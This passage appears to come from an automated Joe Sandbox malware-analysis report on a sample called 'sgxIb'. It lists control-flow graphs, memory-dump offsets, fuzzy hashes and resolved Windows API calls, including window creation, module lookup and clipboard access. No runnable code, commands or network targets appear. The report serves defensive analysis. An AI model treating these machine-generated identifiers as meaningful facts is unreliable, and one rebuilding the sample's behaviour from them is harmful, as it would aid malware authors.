                                                                                                                    control_flow_graph 322 6edd070-6edd08b 323 6edd08d-6edd090 322->323 324 6edd0d9-6edd0dc 323->324 325 6edd092-6edd0a1 323->325 328 6edd0de-6edd120 324->328 329 6edd125-6edd128 324->329 326 6edd0b0-6edd0bc 325->326 327 6edd0a3-6edd0a8 325->327 330 6edda8d-6eddac6 326->330 331 6edd0c2-6edd0d4 326->331 327->326 328->329 332 6edd12a-6edd12c 329->332 333 6edd137-6edd13a 329->333 344 6eddac8-6eddacb 330->344 331->324 334 6edd559 332->334 335 6edd132 332->335 336 6edd13c-6edd141 333->336 337 6edd144-6edd147 333->337 340 6edd55c-6edd568 334->340 335->333 336->337 342 6edd149-6edd18b 337->342 343 6edd190-6edd193 337->343 340->325 345 6edd56e-6edd85b 340->345 342->343 346 6edd1dc-6edd1df 343->346 347 6edd195-6edd1d7 343->347 349 6eddacd-6eddae9 344->349 350 6eddaee-6eddaf1 344->350 535 6edd861-6edd867 345->535 536 6edda82-6edda8c 345->536 351 6edd228-6edd22b 346->351 352 6edd1e1-6edd223 346->352 347->346 349->350 356 6eddb24-6eddb27 350->356 357 6eddaf3-6eddb1f 350->357 359 6edd22d-6edd26f 351->359 360 6edd274-6edd277 351->360 352->351 363 6eddb29 356->363 364 6eddb36-6eddb38 356->364 357->356 359->360 365 6edd279-6edd288 360->365 366 6edd2c0-6edd2c3 360->366 582 6eddb29 call 6eddbf8 363->582 583 6eddb29 call 6eddbe5 363->583 376 6eddb3f-6eddb42 364->376 377 6eddb3a 364->377 374 6edd28a-6edd28f 365->374 375 6edd297-6edd2a3 365->375 370 6edd2c5-6edd2c7 366->370 371 6edd2d2-6edd2d5 366->371 383 6edd2cd 370->383 384 6edd417-6edd420 370->384 385 6edd2d7-6edd2ed 371->385 386 6edd2f2-6edd2f5 371->386 374->375 375->330 381 6edd2a9-6edd2bb 375->381 376->344 382 6eddb44-6eddb53 376->382 377->376 380 6eddb2f-6eddb31 380->364 381->366 408 6eddbba-6eddbcf 382->408 409 6eddb55-6eddbb8 call 6ed66b8 382->409 383->371 389 6edd42f-6edd43b 384->389 390 6edd422-6edd427 384->390 385->386 394 6edd33e-6edd341 386->394 395 6edd2f7-6edd339 386->395 399 6edd54c-6edd551 389->399 400 6edd441-6edd455 389->400 390->389 397 6edd364-6edd367 394->397 398 6edd343-6edd35f 394->398 395->394 397->340 406 6edd36d-6edd370 397->406 398->397 399->334 400->334 423 6edd45b-6edd46d 400->423 416 6edd3b9-6edd3bc 406->416 417 6edd372-6edd3b4 406->417 431 6eddbd0 408->431 409->408 426 6edd3be-6edd400 416->426 427 6edd405-6edd407 416->427 417->416 443 6edd46f-6edd475 423->443 444 6edd491-6edd493 423->444 426->427 429 6edd40e-6edd411 427->429 430 6edd409 427->430 429->323 429->384 430->429 431->431 448 6edd479-6edd485 443->448 449 6edd477 443->449 447 6edd49d-6edd4a9 444->447 462 6edd4ab-6edd4b5 447->462 463 6edd4b7 447->463 453 6edd487-6edd48f 448->453 449->453 453->447 466 6edd4bc-6edd4be 462->466 463->466 466->334 469 6edd4c4-6edd4e0 call 6ed66b8 466->469 478 6edd4ef-6edd4fb 469->478 479 6edd4e2-6edd4e7 469->479 478->399 482 6edd4fd-6edd54a 478->482 479->478 482->334 537 6edd869-6edd86e 535->537 538 6edd876-6edd87f 535->538 537->538 538->330 539 6edd885-6edd898 538->539 541 6edd89e-6edd8a4 539->541 542 6edda72-6edda7c 539->542 543 6edd8a6-6edd8ab 541->543 544 6edd8b3-6edd8bc 541->544 542->535 542->536 543->544 544->330 545 6edd8c2-6edd8e3 544->545 548 6edd8e5-6edd8ea 545->548 549 6edd8f2-6edd8fb 545->549 548->549 549->330 550 6edd901-6edd91e 549->550 550->542 553 6edd924-6edd92a 550->553 553->330 554 6edd930-6edd949 553->554 556 6edd94f-6edd976 554->556 557 6edda65-6edda6c 554->557 556->330 560 6edd97c-6edd986 556->560 557->542 557->553 560->330 561 6edd98c-6edd9a3 560->561 563 6edd9a5-6edd9b0 561->563 564 6edd9b2-6edd9cd 561->564 563->564 564->557 569 6edd9d3-6edd9ec call 6ed66b8 564->569 573 6edd9ee-6edd9f3 569->573 574 6edd9fb-6edda04 569->574 573->574 574->330 575 6edda0a-6edda5e 574->575 575->557 582->380 583->380
                                                                                                                    Strings
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000013.00000002.3023648786.0000000006ED0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06ED0000, based on PE: false
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_19_2_6ed0000_sgxIb.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID:
                                                                                                                    • String ID: $^q$$^q$$^q
                                                                                                                    • API String ID: 0-831282457
                                                                                                                    • Opcode ID: bf0c2615ab1f0d8c0b934117d049adc178a4f3e3ef9886bb1401bb97cff17f3b
                                                                                                                    • Instruction ID: 5994b6d4f3d9dcceb323d1320684a7a4a503709f81182725ec22ff01b0dd5ebf
                                                                                                                    • Opcode Fuzzy Hash: bf0c2615ab1f0d8c0b934117d049adc178a4f3e3ef9886bb1401bb97cff17f3b
                                                                                                                    • Instruction Fuzzy Hash: 01623F70B0031A8FCB55DB69E984A5DB7F2FF84305B209A29D0099F358DB75ED86CB81

                                                                                                                    Control-flow Graph

                                                                                                                    • Executed
                                                                                                                    • Not Executed
                                                                                                                    control_flow_graph 584 75b2148-75b216d 585 75b2173-75b2175 584->585 586 75b22c2-75b22e6 584->586 587 75b217b-75b2184 585->587 588 75b22ed-75b2372 585->588 586->588 590 75b2197-75b21be 587->590 591 75b2186-75b2194 587->591 621 75b2378-75b238b 588->621 622 75b2433 588->622 592 75b2248-75b224c 590->592 593 75b21c4-75b21d7 call 75b1e34 590->593 591->590 597 75b224e-75b227b call 75b1e44 592->597 598 75b2283-75b229c 592->598 593->592 610 75b21d9-75b222c 593->610 613 75b2280 597->613 604 75b229e 598->604 605 75b22a6 598->605 604->605 605->586 610->592 615 75b222e-75b2241 610->615 613->598 615->592 621->622 627 75b2391-75b239d 621->627 624 75b2438-75b2443 622->624 628 75b244a-75b2473 624->628 627->624 630 75b23a3-75b23ce 627->630 632 75b247f-75b2554 628->632 633 75b2475-75b247e 628->633 630->622 640 75b23d0-75b23dc 630->640 654 75b255a-75b2568 632->654 642 75b2428-75b2432 640->642 643 75b23de-75b23e1 640->643 644 75b23e4-75b23ed 643->644 644->628 646 75b23ef-75b240a 644->646 648 75b240c-75b240e 646->648 649 75b2412-75b2415 646->649 648->622 651 75b2410 648->651 649->622 650 75b2417-75b2426 649->650 650->642 650->644 651->650 655 75b256a-75b2570 654->655 656 75b2571-75b25a9 654->656 655->656 660 75b25ab-75b25af 656->660 661 75b25b9 656->661 660->661 662 75b25b1 660->662 663 75b25ba 661->663 662->661 663->663
                                                                                                                    Strings
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000013.00000002.3026849187.00000000075B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 075B0000, based on PE: false
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_19_2_75b0000_sgxIb.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID:
                                                                                                                    • String ID: (bq$(bq$(bq
                                                                                                                    • API String ID: 0-2716923250
                                                                                                                    • Opcode ID: 1986eee2b556088403772d1bd68f2c08903eba0abe023a44c86eccc6386a17aa
                                                                                                                    • Instruction ID: b54caf2a88db9275e33ac6ecd265125d58260b59e47c18e901fd9ac7e447aa70
                                                                                                                    • Opcode Fuzzy Hash: 1986eee2b556088403772d1bd68f2c08903eba0abe023a44c86eccc6386a17aa
                                                                                                                    • Instruction Fuzzy Hash: F0D194B1E002099FDB14DFA9C8546EEBBF2FF89310F148569D409AB391DB749D41CBA1

                                                                                                                    Control-flow Graph

                                                                                                                    • Executed
                                                                                                                    • Not Executed
                                                                                                                    control_flow_graph 664 6ed4c80-6ed4ca4 665 6ed4ca6-6ed4ca9 664->665 666 6ed4cab-6ed4cc5 665->666 667 6ed4cca-6ed4ccd 665->667 666->667 668 6ed53ac-6ed53ae 667->668 669 6ed4cd3-6ed4dcb 667->669 670 6ed53b5-6ed53b8 668->670 671 6ed53b0 668->671 687 6ed4e4e-6ed4e55 669->687 688 6ed4dd1-6ed4e19 669->688 670->665 673 6ed53be-6ed53cb 670->673 671->670 689 6ed4ed9-6ed4ee2 687->689 690 6ed4e5b-6ed4ecb 687->690 709 6ed4e1e call 6ed5529 688->709 710 6ed4e1e call 6ed5538 688->710 689->673 707 6ed4ecd 690->707 708 6ed4ed6 690->708 701 6ed4e24-6ed4e40 704 6ed4e4b 701->704 705 6ed4e42 701->705 704->687 705->704 707->708 708->689 709->701 710->701
                                                                                                                    Strings
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000013.00000002.3023648786.0000000006ED0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06ED0000, based on PE: false
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_19_2_6ed0000_sgxIb.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID:
                                                                                                                    • String ID: fcq$XPcq$\Ocq
                                                                                                                    • API String ID: 0-3575482020
                                                                                                                    • Opcode ID: 23c9a8e13af9f90ef0514ada9be5d51e1efc1d371154d310da0a85e6bff9de11
                                                                                                                    • Instruction ID: 4498a2fcf93a61e7c9622518e70077c12da93787ba2a64a8e8ed77aa8d8e8fbc
                                                                                                                    • Opcode Fuzzy Hash: 23c9a8e13af9f90ef0514ada9be5d51e1efc1d371154d310da0a85e6bff9de11
                                                                                                                    • Instruction Fuzzy Hash: 04617370F002199FEB549FA5C8547AEBBF6FB88700F20842AE509AB395DF759C058B51

                                                                                                                    Control-flow Graph

                                                                                                                    • Executed
                                                                                                                    • Not Executed
                                                                                                                    control_flow_graph 1165 6ed8193-6ed81af 1166 6ed81b1-6ed81b4 1165->1166 1167 6ed83e9-6ed83ec 1166->1167 1168 6ed81ba-6ed81c9 1166->1168 1169 6ed840f-6ed8412 1167->1169 1170 6ed83ee-6ed840a 1167->1170 1174 6ed81e8-6ed822c 1168->1174 1175 6ed81cb-6ed81e6 1168->1175 1172 6ed84bd-6ed84bf 1169->1172 1173 6ed8418-6ed8424 1169->1173 1170->1169 1176 6ed84c6-6ed84c9 1172->1176 1177 6ed84c1 1172->1177 1179 6ed842f-6ed8431 1173->1179 1190 6ed83bd-6ed83d3 1174->1190 1191 6ed8232-6ed8243 1174->1191 1175->1174 1176->1166 1180 6ed84cf-6ed84d8 1176->1180 1177->1176 1183 6ed8449-6ed844d 1179->1183 1184 6ed8433-6ed8439 1179->1184 1188 6ed844f-6ed8459 1183->1188 1189 6ed845b 1183->1189 1186 6ed843d-6ed843f 1184->1186 1187 6ed843b 1184->1187 1186->1183 1187->1183 1192 6ed8460-6ed8462 1188->1192 1189->1192 1190->1167 1199 6ed8249-6ed8266 1191->1199 1200 6ed83a8-6ed83b7 1191->1200 1195 6ed8464-6ed8467 1192->1195 1196 6ed8473-6ed84ac 1192->1196 1195->1180 1196->1168 1210 6ed84b2-6ed84bc 1196->1210 1199->1200 1206 6ed826c-6ed8362 call 6ed66b8 1199->1206 1200->1190 1200->1191 1233 6ed8364-6ed836e 1206->1233 1234 6ed8370 1206->1234 1235 6ed8375-6ed8377 1233->1235 1234->1235 1235->1200 1236 6ed8379-6ed837e 1235->1236 1237 6ed838c 1236->1237 1238 6ed8380-6ed838a 1236->1238 1239 6ed8391-6ed8393 1237->1239 1238->1239 1239->1200 1240 6ed8395-6ed83a1 1239->1240 1240->1200
                                                                                                                    Strings
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000013.00000002.3023648786.0000000006ED0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06ED0000, based on PE: false
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_19_2_6ed0000_sgxIb.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID:
                                                                                                                    • String ID: $^q$$^q
                                                                                                                    • API String ID: 0-355816377
                                                                                                                    • Opcode ID: e24587058efff9457c828bb40f2a9becb360781136d7699edf3f78aa3724b2db
                                                                                                                    • Instruction ID: f4131a68d67bb9323aa4803d8f966ce502b9c75c96e84f3da77735cc6ce99e80
                                                                                                                    • Opcode Fuzzy Hash: e24587058efff9457c828bb40f2a9becb360781136d7699edf3f78aa3724b2db
                                                                                                                    • Instruction Fuzzy Hash: 12819A30B003168FDB58DB79D8546AEB3A6FF88208F149969D809DB394DF75EC478B81

                                                                                                                    Control-flow Graph

                                                                                                                    • Executed
                                                                                                                    • Not Executed
                                                                                                                    control_flow_graph 1242 6ed925a-6ed928d 1244 6ed928f-6ed9292 1242->1244 1245 6ed92b8-6ed92bb 1244->1245 1246 6ed9294-6ed92b3 1244->1246 1247 6ed9b7b-6ed9b7d 1245->1247 1248 6ed92c1-6ed92d6 1245->1248 1246->1245 1250 6ed9b7f 1247->1250 1251 6ed9b84-6ed9b87 1247->1251 1255 6ed92ee-6ed9304 1248->1255 1256 6ed92d8-6ed92de 1248->1256 1250->1251 1251->1244 1253 6ed9b8d-6ed9b97 1251->1253 1260 6ed930f-6ed9311 1255->1260 1257 6ed92e0 1256->1257 1258 6ed92e2-6ed92e4 1256->1258 1257->1255 1258->1255 1261 6ed9329-6ed939a 1260->1261 1262 6ed9313-6ed9319 1260->1262 1273 6ed939c-6ed93bf 1261->1273 1274 6ed93c6-6ed93e2 1261->1274 1263 6ed931d-6ed931f 1262->1263 1264 6ed931b 1262->1264 1263->1261 1264->1261 1273->1274 1279 6ed940e-6ed9429 1274->1279 1280 6ed93e4-6ed9407 1274->1280 1285 6ed942b-6ed944d 1279->1285 1286 6ed9454-6ed946f 1279->1286 1280->1279 1285->1286 1291 6ed949a-6ed94a4 1286->1291 1292 6ed9471-6ed9493 1286->1292 1293 6ed94b4-6ed952e 1291->1293 1294 6ed94a6-6ed94af 1291->1294 1292->1291 1300 6ed957b-6ed9590 1293->1300 1301 6ed9530-6ed954e 1293->1301 1294->1253 1300->1247 1305 6ed956a-6ed9579 1301->1305 1306 6ed9550-6ed955f 1301->1306 1305->1300 1305->1301 1306->1305
                                                                                                                    Strings
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000013.00000002.3023648786.0000000006ED0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06ED0000, based on PE: false
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_19_2_6ed0000_sgxIb.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID:
                                                                                                                    • String ID: $^q$$^q
                                                                                                                    • API String ID: 0-355816377
                                                                                                                    • Opcode ID: 17bf84c80eb2f5bc63500beaa3297c285a971f07aba639b668851e12a2ac551f
                                                                                                                    • Instruction ID: f96318d60547a3d764a9d09caa3e40e07abe35b6dfffa6af9ddb9803044eb76d
                                                                                                                    • Opcode Fuzzy Hash: 17bf84c80eb2f5bc63500beaa3297c285a971f07aba639b668851e12a2ac551f
                                                                                                                    • Instruction Fuzzy Hash: 8D514C34B002059FDB94DB74D990BAE73FAEBC9708F109569D40DDB385DA34AC428B95

                                                                                                                    Control-flow Graph

                                                                                                                    • Executed
                                                                                                                    • Not Executed
                                                                                                                    control_flow_graph 1309 6ed4c71-6ed4ca4 1310 6ed4ca6-6ed4ca9 1309->1310 1311 6ed4cab-6ed4cc5 1310->1311 1312 6ed4cca-6ed4ccd 1310->1312 1311->1312 1313 6ed53ac-6ed53ae 1312->1313 1314 6ed4cd3-6ed4dcb 1312->1314 1315 6ed53b5-6ed53b8 1313->1315 1316 6ed53b0 1313->1316 1332 6ed4e4e-6ed4e55 1314->1332 1333 6ed4dd1-6ed4e19 1314->1333 1315->1310 1318 6ed53be-6ed53cb 1315->1318 1316->1315 1334 6ed4ed9-6ed4ee2 1332->1334 1335 6ed4e5b-6ed4ecb 1332->1335 1354 6ed4e1e call 6ed5529 1333->1354 1355 6ed4e1e call 6ed5538 1333->1355 1334->1318 1352 6ed4ecd 1335->1352 1353 6ed4ed6 1335->1353 1346 6ed4e24-6ed4e40 1349 6ed4e4b 1346->1349 1350 6ed4e42 1346->1350 1349->1332 1350->1349 1352->1353 1353->1334 1354->1346 1355->1346
                                                                                                                    Strings
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000013.00000002.3023648786.0000000006ED0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06ED0000, based on PE: false
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_19_2_6ed0000_sgxIb.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID:
                                                                                                                    • String ID: fcq$XPcq
                                                                                                                    • API String ID: 0-936005338
                                                                                                                    • Opcode ID: fa892fa9c0981884258610efc345ce04bb6baa8ceb1163f4207030eb28261450
                                                                                                                    • Instruction ID: 347c5c098d59620f0e9302b56088605c41e263da5b5d51ef0583e1c7b8b3471a
                                                                                                                    • Opcode Fuzzy Hash: fa892fa9c0981884258610efc345ce04bb6baa8ceb1163f4207030eb28261450
                                                                                                                    • Instruction Fuzzy Hash: B0518074F002099FDB559FB5C8547AEBBF6FF88700F20852AE105AB395DA758C018B91

                                                                                                                    Control-flow Graph

                                                                                                                    • Executed
                                                                                                                    • Not Executed
                                                                                                                    control_flow_graph 1721 6ec5c92-6ec5cfe 1723 6ec5d09-6ec5d10 1721->1723 1724 6ec5d00-6ec5d06 1721->1724 1725 6ec5d1b-6ec5d53 1723->1725 1726 6ec5d12-6ec5d18 1723->1726 1724->1723 1727 6ec5d5b-6ec5dba CreateWindowExW 1725->1727 1726->1725 1728 6ec5dbc-6ec5dc2 1727->1728 1729 6ec5dc3-6ec5dfb 1727->1729 1728->1729 1733 6ec5dfd-6ec5e00 1729->1733 1734 6ec5e08 1729->1734 1733->1734 1735 6ec5e09 1734->1735 1735->1735
                                                                                                                    APIs
                                                                                                                    • CreateWindowExW.USER32(?,?,?,?,?,?,0000000C,?,?,?,?,?), ref: 06EC5DAA
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000013.00000002.3023267983.0000000006EC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06EC0000, based on PE: false
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_19_2_6ec0000_sgxIb.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: CreateWindow
                                                                                                                    • String ID:
                                                                                                                    • API String ID: 716092398-0
                                                                                                                    • Opcode ID: 116b93536489fb1042ff7309756ca14461f814d7707bd886b07e8f404e5ceaad
                                                                                                                    • Instruction ID: ac488a3a185e62dc508ae7d5c387ebb874c91df08bec80d0cd99a8d8f35eb1a1
                                                                                                                    • Opcode Fuzzy Hash: 116b93536489fb1042ff7309756ca14461f814d7707bd886b07e8f404e5ceaad
                                                                                                                    • Instruction Fuzzy Hash: FC51B0B1D003099FDB14CFA9C984ADEBFB5BF88314F24952EE419AB210D771A895CF91

                                                                                                                    Control-flow Graph

                                                                                                                    • Executed
                                                                                                                    • Not Executed
                                                                                                                    control_flow_graph 1736 6ec5c98-6ec5cfe 1737 6ec5d09-6ec5d10 1736->1737 1738 6ec5d00-6ec5d06 1736->1738 1739 6ec5d1b-6ec5dba CreateWindowExW 1737->1739 1740 6ec5d12-6ec5d18 1737->1740 1738->1737 1742 6ec5dbc-6ec5dc2 1739->1742 1743 6ec5dc3-6ec5dfb 1739->1743 1740->1739 1742->1743 1747 6ec5dfd-6ec5e00 1743->1747 1748 6ec5e08 1743->1748 1747->1748 1749 6ec5e09 1748->1749 1749->1749
                                                                                                                    APIs
                                                                                                                    • CreateWindowExW.USER32(?,?,?,?,?,?,0000000C,?,?,?,?,?), ref: 06EC5DAA
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000013.00000002.3023267983.0000000006EC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06EC0000, based on PE: false
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_19_2_6ec0000_sgxIb.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: CreateWindow
                                                                                                                    • String ID:
                                                                                                                    • API String ID: 716092398-0
                                                                                                                    • Opcode ID: 0eb4b4eeeb1110a10cafba70ed84a178cc1bbf03cf365adbc91de6353e3d8160
                                                                                                                    • Instruction ID: a34701291d18e624be79ca8e47684f582e3e086b364e09cdbfd411e5c89f868c
                                                                                                                    • Opcode Fuzzy Hash: 0eb4b4eeeb1110a10cafba70ed84a178cc1bbf03cf365adbc91de6353e3d8160
                                                                                                                    • Instruction Fuzzy Hash: 9941C0B1D003099FDB14CFA9C984ADEBFB5FF88314F24852AE419AB210D771A895CF90

                                                                                                                    Control-flow Graph

                                                                                                                    • Executed
                                                                                                                    • Not Executed
                                                                                                                    control_flow_graph 1750 6ec4b5a-6ec4b5c 1751 6ec4b5e 1750->1751 1752 6ec4b5f 1750->1752 1751->1752 1753 6ec4bac-6ec4bcc 1752->1753 1754 6ec4b61 1752->1754 1755 6ec4bce-6ec4bde 1753->1755 1760 6ec4c03-6ec4c30 1753->1760 1754->1755 1756 6ec4b63-6ec4ba9 1754->1756 1756->1753 1762 6ec4c38-6ec4c63 GetModuleHandleW 1760->1762 1763 6ec4c32-6ec4c35 1760->1763 1764 6ec4c6c-6ec4c80 1762->1764 1765 6ec4c65-6ec4c6b 1762->1765 1763->1762 1765->1764
                                                                                                                    APIs
                                                                                                                    • GetModuleHandleW.KERNEL32(00000000), ref: 06EC4C56
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000013.00000002.3023267983.0000000006EC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06EC0000, based on PE: false
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_19_2_6ec0000_sgxIb.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: HandleModule
                                                                                                                    • String ID:
                                                                                                                    • API String ID: 4139908857-0
                                                                                                                    • Opcode ID: 0f08bd2a976bb9f8254654d4dd769ddbfc79dc2db914b0e3156554025dcdeb40
                                                                                                                    • Instruction ID: aee1e9872510a81648dd2988d8810e5dab5c9e1307f3c1808cc6c6d71b6a4d88
                                                                                                                    • Opcode Fuzzy Hash: 0f08bd2a976bb9f8254654d4dd769ddbfc79dc2db914b0e3156554025dcdeb40
                                                                                                                    • Instruction Fuzzy Hash: 0531ACB4E003488FCB44CFA9C46469EBBF1AF88324F10845EC019EB391D734A906CFA1

                                                                                                                    Control-flow Graph

                                                                                                                    • Executed
                                                                                                                    • Not Executed
                                                                                                                    control_flow_graph 1771 6ec974c-6ecaa64 1774 6ecaa6a-6ecaa6f 1771->1774 1775 6ecab14-6ecab34 call 6ec384c 1771->1775 1777 6ecaa71-6ecaaa8 1774->1777 1778 6ecaac2-6ecaafa CallWindowProcW 1774->1778 1783 6ecab37-6ecab44 1775->1783 1784 6ecaaaa-6ecaab0 1777->1784 1785 6ecaab1-6ecaac0 1777->1785 1779 6ecaafc-6ecab02 1778->1779 1780 6ecab03-6ecab12 1778->1780 1779->1780 1780->1783 1784->1785 1785->1783
                                                                                                                    APIs
                                                                                                                    • CallWindowProcW.USER32(?,?,?,?,?), ref: 06ECAAE9
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000013.00000002.3023267983.0000000006EC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06EC0000, based on PE: false
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_19_2_6ec0000_sgxIb.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: CallProcWindow
                                                                                                                    • String ID:
                                                                                                                    • API String ID: 2714655100-0
                                                                                                                    • Opcode ID: 07cddd55975d0d8a12ec40d9a187f6b449651c6b3ffc68a96120e525fa0a0bcb
                                                                                                                    • Instruction ID: 8912d662b4bda15379d4048151ed0be613d29c92034e63d3d5c422205436bde0
                                                                                                                    • Opcode Fuzzy Hash: 07cddd55975d0d8a12ec40d9a187f6b449651c6b3ffc68a96120e525fa0a0bcb
                                                                                                                    • Instruction Fuzzy Hash: A7415AB59003098FDB54DF99C588AAABBF5FF88324F24C45DD419AB361D730A841CFA0

                                                                                                                    Control-flow Graph

                                                                                                                    • Executed
                                                                                                                    • Not Executed
                                                                                                                    control_flow_graph 1788 6ed59d8-6ed59fc 1789 6ed59fe-6ed5a01 1788->1789 1790 6ed5a0f-6ed5a12 1789->1790 1791 6ed5a03-6ed5a0a 1789->1791 1792 6ed5a18-6ed5bac 1790->1792 1793 6ed5cfb-6ed5cfe 1790->1793 1791->1790 1848 6ed5ce5-6ed5cf8 1792->1848 1849 6ed5bb2-6ed5bb9 1792->1849 1794 6ed5d16-6ed5d19 1793->1794 1795 6ed5d00-6ed5d13 1793->1795 1796 6ed5d1b-6ed5d2c 1794->1796 1797 6ed5d33-6ed5d36 1794->1797 1805 6ed5d2e 1796->1805 1806 6ed5d7b-6ed5d82 1796->1806 1800 6ed5d38-6ed5d49 1797->1800 1801 6ed5d50-6ed5d53 1797->1801 1808 6ed5d5e-6ed5d6f 1800->1808 1812 6ed5d4b 1800->1812 1801->1792 1803 6ed5d59-6ed5d5c 1801->1803 1803->1808 1809 6ed5d76-6ed5d79 1803->1809 1805->1797 1811 6ed5d87-6ed5d8a 1806->1811 1808->1806 1815 6ed5d71 1808->1815 1809->1806 1809->1811 1811->1792 1814 6ed5d90-6ed5d93 1811->1814 1812->1801 1817 6ed5d95-6ed5da6 1814->1817 1818 6ed5db1-6ed5db4 1814->1818 1815->1809 1817->1795 1827 6ed5dac 1817->1827 1819 6ed5dce-6ed5dd1 1818->1819 1820 6ed5db6-6ed5dc7 1818->1820 1821 6ed5ddb-6ed5ddd 1819->1821 1822 6ed5dd3-6ed5dd8 1819->1822 1820->1806 1831 6ed5dc9 1820->1831 1825 6ed5ddf 1821->1825 1826 6ed5de4-6ed5de7 1821->1826 1822->1821 1825->1826 1826->1789 1829 6ed5ded-6ed5df6 1826->1829 1827->1818 1831->1819 1850 6ed5c6d-6ed5c74 1849->1850 1851 6ed5bbf-6ed5be2 1849->1851 1850->1848 1853 6ed5c76-6ed5ca9 1850->1853 1860 6ed5bea-6ed5bf2 1851->1860 1864 6ed5cae-6ed5cdb 1853->1864 1865 6ed5cab 1853->1865 1861 6ed5bf4 1860->1861 1862 6ed5bf7-6ed5c38 1860->1862 1861->1862 1873 6ed5c3a-6ed5c4b 1862->1873 1874 6ed5c50-6ed5c61 1862->1874 1864->1829 1864->1848 1865->1864 1873->1829 1874->1829
                                                                                                                    Strings
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000013.00000002.3023648786.0000000006ED0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06ED0000, based on PE: false
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_19_2_6ed0000_sgxIb.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID:
                                                                                                                    • String ID: $
                                                                                                                    • API String ID: 0-3993045852
                                                                                                                    • Opcode ID: ab767b676cb366471a6b808265b153ecc004ba44df456295b21cd824cdc01fc7
                                                                                                                    • Instruction ID: 25bc7b61ee7a2ff3697e73a09d241ac3c264d6454d493c9b58591e86374b9a06
                                                                                                                    • Opcode Fuzzy Hash: ab767b676cb366471a6b808265b153ecc004ba44df456295b21cd824cdc01fc7
                                                                                                                    • Instruction Fuzzy Hash: D8C19B75F002099FDB54DFA4C494AAEB7F6FF88318F208469D406AB354DA31AD46CBA1
                                                                                                                    APIs
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000013.00000002.3023267983.0000000006EC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06EC0000, based on PE: false
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_19_2_6ec0000_sgxIb.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: Clipboard
                                                                                                                    • String ID:
                                                                                                                    • API String ID: 220874293-0
                                                                                                                    • Opcode ID: 45811850c97f93333790857b18955bb1948ce3cb1a64a8fe11afb6117c5b1957
                                                                                                                    • Instruction ID: 183e6f5f3f1488dd2ccb13b27c60150a6023e580c96da608c57a1c941bf21fa8
                                                                                                                    • Opcode Fuzzy Hash: 45811850c97f93333790857b18955bb1948ce3cb1a64a8fe11afb6117c5b1957
                                                                                                                    • Instruction Fuzzy Hash: 703132B0D01349DFEB24DF99D985BDEBBF1AF48324F208429E005BB290CB75A985CB51
                                                                                                                    APIs
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000013.00000002.3023267983.0000000006EC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06EC0000, based on PE: false
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_19_2_6ec0000_sgxIb.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: Clipboard
                                                                                                                    • String ID:
                                                                                                                    • API String ID: 220874293-0
                                                                                                                    • Opcode ID: 5cdf2b35a960cdf53dcc929c8200ba22a851d1724ef125baaad688a8455a9e7c
                                                                                                                    • Instruction ID: e7e62874724ac4fcdbd1d1f2107423b174c8e6150d429d4661ce4b19a4ac167d
                                                                                                                    • Opcode Fuzzy Hash: 5cdf2b35a960cdf53dcc929c8200ba22a851d1724ef125baaad688a8455a9e7c
                                                                                                                    • Instruction Fuzzy Hash: 4E3100B0D01309DFDB50DF99CA85BDEBBF5AB48314F208029E405BB290DBB5A949CB95
                                                                                                                    APIs
                                                                                                                    • DuplicateHandle.KERNELBASE(?,?,?,?,?,?,?), ref: 06EC9C1F
                                                                                                                    Memory Dump Source
